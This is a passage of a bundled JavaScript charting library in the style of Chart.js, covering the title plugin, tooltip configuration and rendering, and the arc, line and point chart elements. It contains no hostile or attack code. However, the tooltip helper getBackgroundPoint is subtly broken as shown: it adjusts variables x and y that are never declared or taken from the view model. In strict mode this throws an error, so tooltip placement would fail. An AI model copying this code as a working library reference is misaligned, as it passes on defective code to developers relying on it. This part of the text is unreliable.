Chart.plugins.register({
beforeInit: function (chartInstance) {
var opts = chartInstance.options;
var titleOpts = opts.title;
if (titleOpts) {
chartInstance.titleBlock = new Chart.Title({
ctx: chartInstance.chart.ctx,
options: titleOpts,
chart: chartInstance
});
Chart.layoutService.addBox(chartInstance, chartInstance.titleBlock);
}
}
});
};
}, {}], 36: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
/**
* Helper method to merge the opacity into a color
*/
function mergeOpacity(colorString, opacity) {
var color = helpers.color(colorString);
return color.alpha(opacity * color.alpha()).rgbaString();
}
Chart.defaults.global.tooltips = {
enabled: true,
custom: null,
mode: 'nearest',
position: 'average',
intersect: true,
backgroundColor: 'rgba(0,0,0,0.8)',
titleFontStyle: 'bold',
titleSpacing: 2,
titleMarginBottom: 6,
titleFontColor: '#fff',
titleAlign: 'left',
bodySpacing: 2,
bodyFontColor: '#fff',
bodyAlign: 'left',
footerFontStyle: 'bold',
footerSpacing: 2,
footerMarginTop: 6,
footerFontColor: '#fff',
footerAlign: 'left',
yPadding: 6,
xPadding: 6,
caretSize: 5,
cornerRadius: 6,
multiKeyBackground: '#fff',
displayColors: true,
callbacks: {
// Args are: (tooltipItems, data)
beforeTitle: helpers.noop,
title: function (tooltipItems, data) {
// Pick first xLabel for now
var title = '';
var labels = data.labels;
var labelCount = labels ? labels.length : 0;
if (tooltipItems.length > 0) {
var item = tooltipItems[0];
if (item.xLabel) {
title = item.xLabel;
} else if (labelCount > 0 && item.index < labelCount) {
title = labels[item.index];
}
}
return title;
},
afterTitle: helpers.noop,
// Args are: (tooltipItems, data)
beforeBody: helpers.noop,
// Args are: (tooltipItem, data)
beforeLabel: helpers.noop,
label: function (tooltipItem, data) {
var datasetLabel = data.datasets[tooltipItem.datasetIndex].label || '';
return datasetLabel + ': ' + tooltipItem.yLabel;
},
labelColor: function (tooltipItem, chartInstance) {
var meta = chartInstance.getDatasetMeta(tooltipItem.datasetIndex);
var activeElement = meta.data[tooltipItem.index];
var view = activeElement._view;
return {
borderColor: view.borderColor,
backgroundColor: view.backgroundColor
};
},
afterLabel: helpers.noop,
// Args are: (tooltipItems, data)
afterBody: helpers.noop,
// Args are: (tooltipItems, data)
beforeFooter: helpers.noop,
footer: helpers.noop,
afterFooter: helpers.noop
}
};
// Helper to push or concat based on if the 2nd parameter is an array or not
function pushOrConcat(base, toPush) {
if (toPush) {
if (helpers.isArray(toPush)) {
// base = base.concat(toPush);
Array.prototype.push.apply(base, toPush);
} else {
base.push(toPush);
}
}
return base;
}
// Private helper to create a tooltip item model
// @param element : the chart element (point, arc, bar) to create the tooltip item for
// @return : new tooltip item
function createTooltipItem(element) {
var xScale = element._xScale;
var yScale = element._yScale || element._scale; // handle radar || polarArea charts
var index = element._index,
datasetIndex = element._datasetIndex;
return {
xLabel: xScale ? xScale.getLabelForIndex(index, datasetIndex) : '',
yLabel: yScale ? yScale.getLabelForIndex(index, datasetIndex) : '',
index: index,
datasetIndex: datasetIndex,
x: element._model.x,
y: element._model.y
};
}
/**
* Helper to get the reset model for the tooltip
* @param tooltipOpts {Object} the tooltip options
*/
function getBaseModel(tooltipOpts) {
var globalDefaults = Chart.defaults.global;
var getValueOrDefault = helpers.getValueOrDefault;
return {
// Positioning
xPadding: tooltipOpts.xPadding,
yPadding: tooltipOpts.yPadding,
xAlign: tooltipOpts.xAlign,
yAlign: tooltipOpts.yAlign,
// Body
bodyFontColor: tooltipOpts.bodyFontColor,
_bodyFontFamily: getValueOrDefault(tooltipOpts.bodyFontFamily, globalDefaults.defaultFontFamily),
_bodyFontStyle: getValueOrDefault(tooltipOpts.bodyFontStyle, globalDefaults.defaultFontStyle),
_bodyAlign: tooltipOpts.bodyAlign,
bodyFontSize: getValueOrDefault(tooltipOpts.bodyFontSize, globalDefaults.defaultFontSize),
bodySpacing: tooltipOpts.bodySpacing,
// Title
titleFontColor: tooltipOpts.titleFontColor,
_titleFontFamily: getValueOrDefault(tooltipOpts.titleFontFamily, globalDefaults.defaultFontFamily),
_titleFontStyle: getValueOrDefault(tooltipOpts.titleFontStyle, globalDefaults.defaultFontStyle),
titleFontSize: getValueOrDefault(tooltipOpts.titleFontSize, globalDefaults.defaultFontSize),
_titleAlign: tooltipOpts.titleAlign,
titleSpacing: tooltipOpts.titleSpacing,
titleMarginBottom: tooltipOpts.titleMarginBottom,
// Footer
footerFontColor: tooltipOpts.footerFontColor,
_footerFontFamily: getValueOrDefault(tooltipOpts.footerFontFamily, globalDefaults.defaultFontFamily),
_footerFontStyle: getValueOrDefault(tooltipOpts.footerFontStyle, globalDefaults.defaultFontStyle),
footerFontSize: getValueOrDefault(tooltipOpts.footerFontSize, globalDefaults.defaultFontSize),
_footerAlign: tooltipOpts.footerAlign,
footerSpacing: tooltipOpts.footerSpacing,
footerMarginTop: tooltipOpts.footerMarginTop,
// Appearance
caretSize: tooltipOpts.caretSize,
cornerRadius: tooltipOpts.cornerRadius,
backgroundColor: tooltipOpts.backgroundColor,
opacity: 0,
legendColorBackground: tooltipOpts.multiKeyBackground,
displayColors: tooltipOpts.displayColors
};
}
/**
* Get the size of the tooltip
*/
function getTooltipSize(tooltip, model) {
var ctx = tooltip._chart.ctx;
var height = model.yPadding * 2; // Tooltip Padding
var width = 0;
// Count of all lines in the body
var body = model.body;
var combinedBodyLength = body.reduce(function (count, bodyItem) {
return count + bodyItem.before.length + bodyItem.lines.length + bodyItem.after.length;
}, 0);
combinedBodyLength += model.beforeBody.length + model.afterBody.length;
var titleLineCount = model.title.length;
var footerLineCount = model.footer.length;
var titleFontSize = model.titleFontSize,
bodyFontSize = model.bodyFontSize,
footerFontSize = model.footerFontSize;
height += titleLineCount * titleFontSize; // Title Lines
height += titleLineCount ? (titleLineCount - 1) * model.titleSpacing : 0; // Title Line Spacing
height += titleLineCount ? model.titleMarginBottom : 0; // Title's bottom Margin
height += combinedBodyLength * bodyFontSize; // Body Lines
height += combinedBodyLength ? (combinedBodyLength - 1) * model.bodySpacing : 0; // Body Line Spacing
height += footerLineCount ? model.footerMarginTop : 0; // Footer Margin
height += footerLineCount * (footerFontSize); // Footer Lines
height += footerLineCount ? (footerLineCount - 1) * model.footerSpacing : 0; // Footer Line Spacing
// Title width
var widthPadding = 0;
var maxLineWidth = function (line) {
width = Math.max(width, ctx.measureText(line).width + widthPadding);
};
ctx.font = helpers.fontString(titleFontSize, model._titleFontStyle, model._titleFontFamily);
helpers.each(model.title, maxLineWidth);
// Body width
ctx.font = helpers.fontString(bodyFontSize, model._bodyFontStyle, model._bodyFontFamily);
helpers.each(model.beforeBody.concat(model.afterBody), maxLineWidth);
// Body lines may include some extra width due to the color box
widthPadding = model.displayColors ? (bodyFontSize + 2) : 0;
helpers.each(body, function (bodyItem) {
helpers.each(bodyItem.before, maxLineWidth);
helpers.each(bodyItem.lines, maxLineWidth);
helpers.each(bodyItem.after, maxLineWidth);
});
// Reset back to 0
widthPadding = 0;
// Footer width
ctx.font = helpers.fontString(footerFontSize, model._footerFontStyle, model._footerFontFamily);
helpers.each(model.footer, maxLineWidth);
// Add padding
width += 2 * model.xPadding;
return {
width: width,
height: height
};
}
/**
* Helper to get the alignment of a tooltip given the size
*/
function determineAlignment(tooltip, size) {
var model = tooltip._model;
var chart = tooltip._chart;
var chartArea = tooltip._chartInstance.chartArea;
var xAlign = 'center';
var yAlign = 'center';
if (model.y < size.height) {
yAlign = 'top';
} else if (model.y > (chart.height - size.height)) {
yAlign = 'bottom';
}
var lf, rf; // functions to determine left, right alignment
var olf, orf; // functions to determine if left/right alignment causes tooltip to go outside chart
var yf; // function to get the y alignment if the tooltip goes outside of the left or right edges
var midX = (chartArea.left + chartArea.right) / 2;
var midY = (chartArea.top + chartArea.bottom) / 2;
if (yAlign === 'center') {
lf = function (x) {
return x <= midX;
};
rf = function (x) {
return x > midX;
};
} else {
lf = function (x) {
return x <= (size.width / 2);
};
rf = function (x) {
return x >= (chart.width - (size.width / 2));
};
}
olf = function (x) {
return x + size.width > chart.width;
};
orf = function (x) {
return x - size.width < 0;
};
yf = function (y) {
return y <= midY ? 'top' : 'bottom';
};
if (lf(model.x)) {
xAlign = 'left';
// Is tooltip too wide and goes over the right side of the chart.?
if (olf(model.x)) {
xAlign = 'center';
yAlign = yf(model.y);
}
} else if (rf(model.x)) {
xAlign = 'right';
// Is tooltip too wide and goes outside left edge of canvas?
if (orf(model.x)) {
xAlign = 'center';
yAlign = yf(model.y);
}
}
var opts = tooltip._options;
return {
xAlign: opts.xAlign ? opts.xAlign : xAlign,
yAlign: opts.yAlign ? opts.yAlign : yAlign
};
}
/**
* @Helper to get the location a tooltip needs to be placed at given the initial position (via the vm) and the size and alignment
*/
function getBackgroundPoint(vm, size, alignment) {
// Background Position |
var caretSize = vm.caretSize,
caretPadding = vm.caretPadding,
cornerRadius = vm.cornerRadius,
xAlign = alignment.xAlign,
yAlign = alignment.yAlign,
paddingAndSize = caretSize + caretPadding,
radiusAndPadding = cornerRadius + caretPadding;
if (xAlign === 'right') {
x -= size.width;
} else if (xAlign === 'center') {
x -= (size.width / 2);
}
if (yAlign === 'top') {
y += paddingAndSize;
} else if (yAlign === 'bottom') {
y -= size.height + paddingAndSize;
} else {
y -= (size.height / 2);
}
if (yAlign === 'center') {
if (xAlign === 'left') {
x += paddingAndSize;
} else if (xAlign === 'right') {
x -= paddingAndSize;
}
} else if (xAlign === 'left') {
x -= radiusAndPadding;
} else if (xAlign === 'right') {
x += radiusAndPadding;
}
return {
x: x,
y: y
};
}
Chart.Tooltip = Chart.Element.extend({
initialize: function () {
this._model = getBaseModel(this._options);
},
// Get the title
// Args are: (tooltipItem, data)
getTitle: function () {
var me = this;
var opts = me._options;
var callbacks = opts.callbacks;
var beforeTitle = callbacks.beforeTitle.apply(me, arguments),
title = callbacks.title.apply(me, arguments),
afterTitle = callbacks.afterTitle.apply(me, arguments);
var lines = [];
lines = pushOrConcat(lines, beforeTitle);
lines = pushOrConcat(lines, title);
lines = pushOrConcat(lines, afterTitle);
return lines;
},
// Args are: (tooltipItem, data)
getBeforeBody: function () {
var lines = this._options.callbacks.beforeBody.apply(this, arguments);
return helpers.isArray(lines) ? lines : lines !== undefined ? [lines] : [];
},
// Args are: (tooltipItem, data)
getBody: function (tooltipItems, data) {
var me = this;
var callbacks = me._options.callbacks;
var bodyItems = [];
helpers.each(tooltipItems, function (tooltipItem) {
var bodyItem = {
before: [],
lines: [],
after: []
};
pushOrConcat(bodyItem.before, callbacks.beforeLabel.call(me, tooltipItem, data));
pushOrConcat(bodyItem.lines, callbacks.label.call(me, tooltipItem, data));
pushOrConcat(bodyItem.after, callbacks.afterLabel.call(me, tooltipItem, data));
bodyItems.push(bodyItem);
});
return bodyItems;
},
// Args are: (tooltipItem, data)
getAfterBody: function () {
var lines = this._options.callbacks.afterBody.apply(this, arguments);
return helpers.isArray(lines) ? lines : lines !== undefined ? [lines] : [];
},
// Get the footer and beforeFooter and afterFooter lines
// Args are: (tooltipItem, data)
getFooter: function () {
var me = this;
var callbacks = me._options.callbacks;
var beforeFooter = callbacks.beforeFooter.apply(me, arguments);
var footer = callbacks.footer.apply(me, arguments);
var afterFooter = callbacks.afterFooter.apply(me, arguments);
var lines = [];
lines = pushOrConcat(lines, beforeFooter);
lines = pushOrConcat(lines, footer);
lines = pushOrConcat(lines, afterFooter);
return lines;
},
update: function (changed) {
var me = this;
var opts = me._options;
// Need to regenerate the model because its faster than using extend and it is necessary due to the optimization in Chart.Element.transition
// that does _view = _model if ease === 1. This causes the 2nd tooltip update to set properties in both the view and model at the same time
// which breaks any animations.
var existingModel = me._model;
var model = me._model = getBaseModel(opts);
var active = me._active;
var data = me._data;
var chartInstance = me._chartInstance;
// In the case where active.length === 0 we need to keep these at existing values for good animations
var alignment = {
xAlign: existingModel.xAlign,
yAlign: existingModel.yAlign
};
var backgroundPoint = {
x: existingModel.x,
y: existingModel.y
};
var tooltipSize = {
width: existingModel.width,
height: existingModel.height
};
var tooltipPosition = {
x: existingModel.caretX,
y: existingModel.caretY
};
var i, len;
if (active.length) {
model.opacity = 1;
var labelColors = [];
tooltipPosition = Chart.Tooltip.positioners[opts.position](active, me._eventPosition);
var tooltipItems = [];
for (i = 0, len = active.length; i < len; ++i) {
tooltipItems.push(createTooltipItem(active[i]));
}
// If the user provided a filter function, use it to modify the tooltip items
if (opts.filter) {
tooltipItems = tooltipItems.filter(function (a) {
return opts.filter(a, data);
});
}
// If the user provided a sorting function, use it to modify the tooltip items
if (opts.itemSort) {
tooltipItems = tooltipItems.sort(function (a, b) {
return opts.itemSort(a, b, data);
});
}
// Determine colors for boxes
helpers.each(tooltipItems, function (tooltipItem) {
labelColors.push(opts.callbacks.labelColor.call(me, tooltipItem, chartInstance));
});
// Build the Text Lines
model.title = me.getTitle(tooltipItems, data);
model.beforeBody = me.getBeforeBody(tooltipItems, data);
model.body = me.getBody(tooltipItems, data);
model.afterBody = me.getAfterBody(tooltipItems, data);
model.footer = me.getFooter(tooltipItems, data);
// Initial positioning and colors
model.x = Math.round(tooltipPosition.x);
model.y = Math.round(tooltipPosition.y);
model.caretPadding = helpers.getValueOrDefault(tooltipPosition.padding, 2);
model.labelColors = labelColors;
// data points
model.dataPoints = tooltipItems;
// We need to determine alignment of the tooltip
tooltipSize = getTooltipSize(this, model);
alignment = determineAlignment(this, tooltipSize);
// Final Size and Position
backgroundPoint = getBackgroundPoint(model, tooltipSize, alignment);
} else {
model.opacity = 0;
}
model.xAlign = alignment.xAlign;
model.yAlign = alignment.yAlign;
model.x = backgroundPoint.x;
model.y = backgroundPoint.y;
model.width = tooltipSize.width;
model.height = tooltipSize.height;
// Point where the caret on the tooltip points to
model.caretX = tooltipPosition.x;
model.caretY = tooltipPosition.y;
me._model = model;
if (changed && opts.custom) {
opts.custom.call(me, model);
}
return me;
},
drawCaret: function (tooltipPoint, size, opacity) {
var vm = this._view;
var ctx = this._chart.ctx;
var x1, x2, x3;
var y1, y2, y3;
var caretSize = vm.caretSize;
var cornerRadius = vm.cornerRadius;
var xAlign = vm.xAlign,
yAlign = vm.yAlign;
var ptX = tooltipPoint.x,
ptY = tooltipPoint.y;
var width = size.width,
height = size.height;
if (yAlign === 'center') {
// Left or right side
if (xAlign === 'left') {
x1 = ptX;
x2 = x1 - caretSize;
x3 = x1;
} else {
x1 = ptX + width;
x2 = x1 + caretSize;
x3 = x1;
}
y2 = ptY + (height / 2);
y1 = y2 - caretSize;
y3 = y2 + caretSize;
} else {
if (xAlign === 'left') {
x1 = ptX + cornerRadius;
x2 = x1 + caretSize;
x3 = x2 + caretSize;
} else if (xAlign === 'right') {
x1 = ptX + width - cornerRadius;
x2 = x1 - caretSize;
x3 = x2 - caretSize;
} else {
x2 = ptX + (width / 2);
x1 = x2 - caretSize;
x3 = x2 + caretSize;
}
if (yAlign === 'top') {
y1 = ptY;
y2 = y1 - caretSize;
y3 = y1;
} else {
y1 = ptY + height;
y2 = y1 + caretSize;
y3 = y1;
}
}
ctx.fillStyle = mergeOpacity(vm.backgroundColor, opacity);
ctx.beginPath();
ctx.moveTo(x1, y1);
ctx.lineTo(x2, y2);
ctx.lineTo(x3, y3);
ctx.closePath();
ctx.fill();
},
drawTitle: function (pt, vm, ctx, opacity) {
var title = vm.title;
if (title.length) {
ctx.textAlign = vm._titleAlign;
ctx.textBaseline = 'top';
var titleFontSize = vm.titleFontSize,
titleSpacing = vm.titleSpacing;
ctx.fillStyle = mergeOpacity(vm.titleFontColor, opacity);
ctx.font = helpers.fontString(titleFontSize, vm._titleFontStyle, vm._titleFontFamily);
var i, len;
for (i = 0, len = title.length; i < len; ++i) {
ctx.fillText(title[i], pt.x, pt.y);
pt.y += titleFontSize + titleSpacing; // Line Height and spacing
if (i + 1 === title.length) {
pt.y += vm.titleMarginBottom - titleSpacing; // If Last, add margin, remove spacing
}
}
}
},
drawBody: function (pt, vm, ctx, opacity) {
var bodyFontSize = vm.bodyFontSize;
var bodySpacing = vm.bodySpacing;
var body = vm.body;
ctx.textAlign = vm._bodyAlign;
ctx.textBaseline = 'top';
var textColor = mergeOpacity(vm.bodyFontColor, opacity);
ctx.fillStyle = textColor;
ctx.font = helpers.fontString(bodyFontSize, vm._bodyFontStyle, vm._bodyFontFamily);
// Before Body
var xLinePadding = 0;
var fillLineOfText = function (line) {
ctx.fillText(line, pt.x + xLinePadding, pt.y);
pt.y += bodyFontSize + bodySpacing;
};
// Before body lines
helpers.each(vm.beforeBody, fillLineOfText);
var drawColorBoxes = vm.displayColors;
xLinePadding = drawColorBoxes ? (bodyFontSize + 2) : 0;
// Draw body lines now
helpers.each(body, function (bodyItem, i) {
helpers.each(bodyItem.before, fillLineOfText);
helpers.each(bodyItem.lines, function (line) {
// Draw Legend-like boxes if needed
if (drawColorBoxes) {
// Fill a white rect so that colours merge nicely if the opacity is < 1
ctx.fillStyle = mergeOpacity(vm.legendColorBackground, opacity);
ctx.fillRect(pt.x, pt.y, bodyFontSize, bodyFontSize);
// Border
ctx.strokeStyle = mergeOpacity(vm.labelColors[i].borderColor, opacity);
ctx.strokeRect(pt.x, pt.y, bodyFontSize, bodyFontSize);
// Inner square
ctx.fillStyle = mergeOpacity(vm.labelColors[i].backgroundColor, opacity);
ctx.fillRect(pt.x + 1, pt.y + 1, bodyFontSize - 2, bodyFontSize - 2);
ctx.fillStyle = textColor;
}
fillLineOfText(line);
});
helpers.each(bodyItem.after, fillLineOfText);
});
// Reset back to 0 for after body
xLinePadding = 0;
// After body lines
helpers.each(vm.afterBody, fillLineOfText);
pt.y -= bodySpacing; // Remove last body spacing
},
drawFooter: function (pt, vm, ctx, opacity) {
var footer = vm.footer;
if (footer.length) {
pt.y += vm.footerMarginTop;
ctx.textAlign = vm._footerAlign;
ctx.textBaseline = 'top';
ctx.fillStyle = mergeOpacity(vm.footerFontColor, opacity);
ctx.font = helpers.fontString(vm.footerFontSize, vm._footerFontStyle, vm._footerFontFamily);
helpers.each(footer, function (line) {
ctx.fillText(line, pt.x, pt.y);
pt.y += vm.footerFontSize + vm.footerSpacing;
});
}
},
drawBackground: function (pt, vm, ctx, tooltipSize, opacity) {
ctx.fillStyle = mergeOpacity(vm.backgroundColor, opacity);
helpers.drawRoundedRectangle(ctx, pt.x, pt.y, tooltipSize.width, tooltipSize.height, vm.cornerRadius);
ctx.fill();
},
draw: function () {
var ctx = this._chart.ctx;
var vm = this._view;
if (vm.opacity === 0) {
return;
}
var tooltipSize = {
width: vm.width,
height: vm.height
};
var pt = {
x: vm.x,
y: vm.y
};
// IE11/Edge does not like very small opacities, so snap to 0
var opacity = Math.abs(vm.opacity < 1e-3) ? 0 : vm.opacity;
if (this._options.enabled) {
// Draw Background
this.drawBackground(pt, vm, ctx, tooltipSize, opacity);
// Draw Caret
this.drawCaret(pt, tooltipSize, opacity);
// Draw Title, Body, and Footer
pt.x += vm.xPadding;
pt.y += vm.yPadding;
// Titles
this.drawTitle(pt, vm, ctx, opacity);
// Body
this.drawBody(pt, vm, ctx, opacity);
// Footer
this.drawFooter(pt, vm, ctx, opacity);
}
},
/**
* Handle an event
* @private
* @param e {Event} the event to handle
* @returns {Boolean} true if the tooltip changed
*/
handleEvent: function (e) {
var me = this;
var options = me._options;
var changed = false;
me._lastActive = me._lastActive || [];
// Find Active Elements for tooltips
if (e.type === 'mouseout') {
me._active = [];
} else {
me._active = me._chartInstance.getElementsAtEventForMode(e, options.mode, options);
}
// Remember Last Actives
changed = !helpers.arrayEquals(me._active, me._lastActive);
me._lastActive = me._active;
if (options.enabled || options.custom) {
me._eventPosition = helpers.getRelativePosition(e, me._chart);
var model = me._model;
me.update(true);
me.pivot();
// See if our tooltip position changed
changed |= (model.x !== me._model.x) || (model.y !== me._model.y);
}
return changed;
}
});
/**
* @namespace Chart.Tooltip.positioners
*/
Chart.Tooltip.positioners = {
/**
* Average mode places the tooltip at the average position of the elements shown
* @function Chart.Tooltip.positioners.average
* @param elements {ChartElement[]} the elements being displayed in the tooltip
* @returns {Point} tooltip position
*/
average: function (elements) {
if (!elements.length) {
return false;
}
var i, len;
var x = 0;
var y = 0;
var count = 0;
for (i = 0, len = elements.length; i < len; ++i) {
var el = elements[i];
if (el && el.hasValue()) {
var pos = el.tooltipPosition();
x += pos.x;
y += pos.y;
++count;
}
}
return {
x: Math.round(x / count),
y: Math.round(y / count)
};
},
/**
* Gets the tooltip position nearest of the item nearest to the event position
* @function Chart.Tooltip.positioners.nearest
* @param elements {Chart.Element[]} the tooltip elements
* @param eventPosition {Point} the position of the event in canvas coordinates
* @returns {Point} the tooltip position
*/
nearest: function (elements, eventPosition) {
var x = eventPosition.x;
var y = eventPosition.y;
var nearestElement;
var minDistance = Number.POSITIVE_INFINITY;
var i, len;
for (i = 0, len = elements.length; i < len; ++i) {
var el = elements[i];
if (el && el.hasValue()) {
var center = el.getCenterPoint();
var d = helpers.distanceBetweenPoints(eventPosition, center);
if (d < minDistance) {
minDistance = d;
nearestElement = el;
}
}
}
if (nearestElement) {
var tp = nearestElement.tooltipPosition();
x = tp.x;
y = tp.y;
}
return {
x: x,
y: y
};
}
};
};
}, {}], 37: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers,
globalOpts = Chart.defaults.global;
globalOpts.elements.arc = {
backgroundColor: globalOpts.defaultColor,
borderColor: '#fff',
borderWidth: 2
};
Chart.elements.Arc = Chart.Element.extend({
inLabelRange: function (mouseX) {
var vm = this._view;
if (vm) {
return (Math.pow(mouseX - vm.x, 2) < Math.pow(vm.radius + vm.hoverRadius, 2));
}
return false;
},
inRange: function (chartX, chartY) {
var vm = this._view;
if (vm) {
var pointRelativePosition = helpers.getAngleFromPoint(vm, {
x: chartX,
y: chartY
}),
angle = pointRelativePosition.angle,
distance = pointRelativePosition.distance;
// Sanitise angle range
var startAngle = vm.startAngle;
var endAngle = vm.endAngle;
while (endAngle < startAngle) {
endAngle += 2.0 * Math.PI;
}
while (angle > endAngle) {
angle -= 2.0 * Math.PI;
}
while (angle < startAngle) {
angle += 2.0 * Math.PI;
}
// Check if within the range of the open/close angle
var betweenAngles = (angle >= startAngle && angle <= endAngle),
withinRadius = (distance >= vm.innerRadius && distance <= vm.outerRadius);
return (betweenAngles && withinRadius);
}
return false;
},
getCenterPoint: function () {
var vm = this._view;
var halfAngle = (vm.startAngle + vm.endAngle) / 2;
var halfRadius = (vm.innerRadius + vm.outerRadius) / 2;
return {
x: vm.x + Math.cos(halfAngle) * halfRadius,
y: vm.y + Math.sin(halfAngle) * halfRadius
};
},
getArea: function () {
var vm = this._view;
return Math.PI * ((vm.endAngle - vm.startAngle) / (2 * Math.PI)) * (Math.pow(vm.outerRadius, 2) - Math.pow(vm.innerRadius, 2));
},
tooltipPosition: function () {
var vm = this._view;
var centreAngle = vm.startAngle + ((vm.endAngle - vm.startAngle) / 2),
rangeFromCentre = (vm.outerRadius - vm.innerRadius) / 2 + vm.innerRadius;
return {
x: vm.x + (Math.cos(centreAngle) * rangeFromCentre),
y: vm.y + (Math.sin(centreAngle) * rangeFromCentre)
};
},
draw: function () {
var ctx = this._chart.ctx,
vm = this._view,
sA = vm.startAngle,
eA = vm.endAngle;
ctx.beginPath();
ctx.arc(vm.x, vm.y, vm.outerRadius, sA, eA);
ctx.arc(vm.x, vm.y, vm.innerRadius, eA, sA, true);
ctx.closePath();
ctx.strokeStyle = vm.borderColor;
ctx.lineWidth = vm.borderWidth;
ctx.fillStyle = vm.backgroundColor;
ctx.fill();
ctx.lineJoin = 'bevel';
if (vm.borderWidth) {
ctx.stroke();
}
}
});
};
}, {}], 38: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
var globalDefaults = Chart.defaults.global;
Chart.defaults.global.elements.line = {
tension: 0.4,
backgroundColor: globalDefaults.defaultColor,
borderWidth: 3,
borderColor: globalDefaults.defaultColor,
borderCapStyle: 'butt',
borderDash: [],
borderDashOffset: 0.0,
borderJoinStyle: 'miter',
capBezierPoints: true,
fill: true, // do we fill in the area between the line and its base axis
};
Chart.elements.Line = Chart.Element.extend({
draw: function () {
var me = this;
var vm = me._view;
var spanGaps = vm.spanGaps;
var fillPoint = vm.scaleZero;
var loop = me._loop;
// Handle different fill modes for cartesian lines
if (!loop) {
if (vm.fill === 'top') {
fillPoint = vm.scaleTop;
} else if (vm.fill === 'bottom') {
fillPoint = vm.scaleBottom;
}
}
var ctx = me._chart.ctx;
ctx.save();
// Helper function to draw a line to a point
function lineToPoint(previousPoint, point) {
var pointVM = point._view;
if (point._view.steppedLine === true) {
ctx.lineTo(pointVM.x, previousPoint._view.y);
ctx.lineTo(pointVM.x, pointVM.y);
} else if (point._view.tension === 0) {
ctx.lineTo(pointVM.x, pointVM.y);
} else {
ctx.bezierCurveTo(
previousPoint._view.controlPointNextX,
previousPoint._view.controlPointNextY,
pointVM.controlPointPreviousX,
pointVM.controlPointPreviousY,
pointVM.x,
pointVM.y
);
}
}
var points = me._children.slice(); // clone array
var lastDrawnIndex = -1;
// If we are looping, adding the first point again
if (loop && points.length) {
points.push(points[0]);
}
var index, current, previous, currentVM;
// Fill Line
if (points.length && vm.fill) {
ctx.beginPath();
for (index = 0; index < points.length; ++index) {
current = points[index];
previous = helpers.previousItem(points, index);
currentVM = current._view;
// First point moves to it's starting position no matter what
if (index === 0) {
if (loop) {
ctx.moveTo(fillPoint.x, fillPoint.y);
} else {
ctx.moveTo(currentVM.x, fillPoint);
}
if (!currentVM.skip) {
lastDrawnIndex = index;
ctx.lineTo(currentVM.x, currentVM.y);
}
} else {
previous = lastDrawnIndex === -1 ? previous : points[lastDrawnIndex];
if (currentVM.skip) {
// Only do this if this is the first point that is skipped
if (!spanGaps && lastDrawnIndex === (index - 1)) {
if (loop) {
ctx.lineTo(fillPoint.x, fillPoint.y);
} else {
ctx.lineTo(previous._view.x, fillPoint);
}
}
} else {
if (lastDrawnIndex !== (index - 1)) {
// There was a gap and this is the first point after the gap. If we've never drawn a point, this is a special case.
// If the first data point is NaN, then there is no real gap to skip
if (spanGaps && lastDrawnIndex !== -1) {
// We are spanning the gap, so simple draw a line to this point
lineToPoint(previous, current);
} else if (loop) {
ctx.lineTo(currentVM.x, currentVM.y);
} else {
ctx.lineTo(currentVM.x, fillPoint);
ctx.lineTo(currentVM.x, currentVM.y);
}
} else {
// Line to next point
lineToPoint(previous, current);
}
lastDrawnIndex = index;
}
}
}
if (!loop && lastDrawnIndex !== -1) {
ctx.lineTo(points[lastDrawnIndex]._view.x, fillPoint);
}
ctx.fillStyle = vm.backgroundColor || globalDefaults.defaultColor;
ctx.closePath();
ctx.fill();
}
// Stroke Line Options
var globalOptionLineElements = globalDefaults.elements.line;
ctx.lineCap = vm.borderCapStyle || globalOptionLineElements.borderCapStyle;
// IE 9 and 10 do not support line dash
if (ctx.setLineDash) {
ctx.setLineDash(vm.borderDash || globalOptionLineElements.borderDash);
}
ctx.lineDashOffset = vm.borderDashOffset || globalOptionLineElements.borderDashOffset;
ctx.lineJoin = vm.borderJoinStyle || globalOptionLineElements.borderJoinStyle;
ctx.lineWidth = vm.borderWidth || globalOptionLineElements.borderWidth;
ctx.strokeStyle = vm.borderColor || globalDefaults.defaultColor;
// Stroke Line
ctx.beginPath();
lastDrawnIndex = -1;
for (index = 0; index < points.length; ++index) {
current = points[index];
previous = helpers.previousItem(points, index);
currentVM = current._view;
// First point moves to it's starting position no matter what
if (index === 0) {
if (!currentVM.skip) {
ctx.moveTo(currentVM.x, currentVM.y);
lastDrawnIndex = index;
}
} else {
previous = lastDrawnIndex === -1 ? previous : points[lastDrawnIndex];
if (!currentVM.skip) {
if ((lastDrawnIndex !== (index - 1) && !spanGaps) || lastDrawnIndex === -1) {
// There was a gap and this is the first point after the gap
ctx.moveTo(currentVM.x, currentVM.y);
} else {
// Line to next point
lineToPoint(previous, current);
}
lastDrawnIndex = index;
}
}
}
ctx.stroke();
ctx.restore();
}
});
};
}, {}], 39: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers,
globalOpts = Chart.defaults.global,
defaultColor = globalOpts.defaultColor;
globalOpts.elements.point = {
radius: 3,
pointStyle: 'circle',
backgroundColor: defaultColor,
borderWidth: 1,
borderColor: defaultColor,
// Hover
hitRadius: 1,
hoverRadius: 4,
hoverBorderWidth: 1
};
function xRange(mouseX) {
var vm = this._view;
return vm ? (Math.pow(mouseX - vm.x, 2) < Math.pow(vm.radius + vm.hitRadius, 2)) : false;
}
function yRange(mouseY) {
var vm = this._view;
return vm ? (Math.pow(mouseY - vm.y, 2) < Math.pow(vm.radius + vm.hitRadius, 2)) : false;
}
Chart.elements.Point = Chart.Element.extend({
inRange: function (mouseX, mouseY) {
var vm = this._view;
return vm ? ((Math.pow(mouseX - vm.x, 2) + Math.pow(mouseY - vm.y, 2)) < Math.pow(vm.hitRadius + vm.radius, 2)) : false;
},
inLabelRange: xRange,
inXRange: xRange,
inYRange: yRange,
getCenterPoint: function () {
var vm = this._view;
return {
x: vm.x,
y: vm.y
};
},
getArea: function () {
return Math.PI * Math.pow(this._view.radius, 2);
},
tooltipPosition: function () {
var vm = this._view;
return {
x: vm.x,
y: vm.y,
padding: vm.radius + vm.borderWidth
};
},
draw: function () {
var vm = this._view;
var ctx = this._chart.ctx;
var pointStyle = vm.pointStyle;
var radius = vm.radius;
var x = vm.x;
var y = vm.y;
if (vm.skip) {
return;
}
ctx.strokeStyle = vm.borderColor || defaultColor;
ctx.lineWidth = helpers.getValueOrDefault(vm.borderWidth, globalOpts.elements.point.borderWidth);
ctx.fillStyle = vm.backgroundColor || defaultColor;
Chart.canvasHelpers.drawPoint(ctx, pointStyle, radius, x, y);
}
});
};
}, {}], 40: [function (require, module, exports) {
